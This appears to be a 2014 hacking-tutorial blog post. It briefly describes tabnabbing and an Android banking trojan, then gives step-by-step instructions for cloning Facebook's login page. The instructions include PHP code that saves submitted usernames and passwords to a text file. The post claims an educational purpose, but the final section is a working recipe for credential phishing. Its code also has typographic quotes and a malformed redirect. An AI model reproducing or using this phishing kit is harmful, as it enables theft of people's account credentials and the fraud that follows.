Friday 4 July 2014

TAB NAPPING

Tab napping is a new advanced method of phishing it is also used to steal your personal information like username and passwords, bank details or password and etc. Tab napping is done when you have multiples tab open like you are watching videos on you tube or chatting on Facebook and booking tickets etc, its something script which you enter into your web site or blog and when the victim visit on your website or blog or click on your link now when you go to the other tab You will be redirect to the phishing page which hacker has created and it will ask you to enter the user name and password like you were chatting on the Facebook and also watching videos on you tube now you will be redirect again to Facebook page and it will ask you to enter your username and password again and when you enter your user name and password hacker will get all your information because it was a phishing page.




DO NOT CLICK ANY LINK BEFORE VERIFYING IT OR DO NOT OPEN MULTIPLE TABS WHILE ENTERING YOUR BANK DETAILS OR INTERNET SHOPPING.

HIJACT RACT ANDROID MALWARE

HIJACK RACT ia  new android malware which comprise accounts of mobile banking users
 It can give remote control of the infected device to hackers. It can steal your personal information like SMS or messages and also read your contacts ,

HOW HACKERS HACK USING PHIHING ATTACK

As i already told you about phishing in my video tutorial that how hackers hack your email account using phishing . Phishing is fraudulent scam where hacker sends you a link of phishing website to you and when you double click on that link it will take you to the fake website which hacker has created . Phishing is used to steal your personal information like your email account password, your bank accounts details or passwords and etc depending upon the hacker what he wants. Phishing is a Social Engineering attack where hacker create a fake login page of the website or send it you and ask you to open that website or  when you open that website or enter your personal information on the website  hacker gets that information because you have not entered the information on the real page or website , you have entered the information on hacker websites or login page which he has uploaded on the web hosting account or web server so he will get all your information which you have been entered.


THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSES FREE IT EDUCATION WORLD IS NOT MOTIVATING  YOU OR ENCOURAGING YOU FOR HACKING  . HACKING IS ILLEGAL OR CRIME .


How hackers create a phishing page ?

1. First You need a  a web hosting account where you can upload all you files . You can upload your files on a free webhosting account you can create a free web hosting account like my2gb.com or byethost.com or etc.

2. After creating a web hosting account now you need a phishing page or PHP file to create a fake page of the website you just open that website like if you want to create a fake page of facebook just open the facebook website and right click on the website or click on "view page source" option now you will see all the source code you can see in picture below

Now you can search for action="https://www.facebook.com/login.php

Now Change it to action="facebook.php and save the file with name as facebook.htm

3 Nor you need php code just copy the code and save in into note pad as facebook.php

 <?php
header (‘https://www.facebook.com’);
$handle = fopen(“facebook.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?> 

Copy the above code and paste it into notepad and save it as facebook.php
Now everything is done you have successfully link your code with facebook page now upload both the files facebook.php and facebook.htm on your web hosting account.

TO DETECT THE PHISHING PAGE OR PHISHING WEBSITE YOU CAN GO TO HTTP://WWW.PHISHTANK.COM
FORE MORE DETAILS ON PHISHING YOU CAN WATCH MY VIDEO TUTORIAL  HOW HACKERS HACK YOUR EMAIL ACCOUNT WITH PHISHING
http://www.freeiteducationworld.blogspot.in/2014/05/how-to-hack-facebook-account-part-1_6.html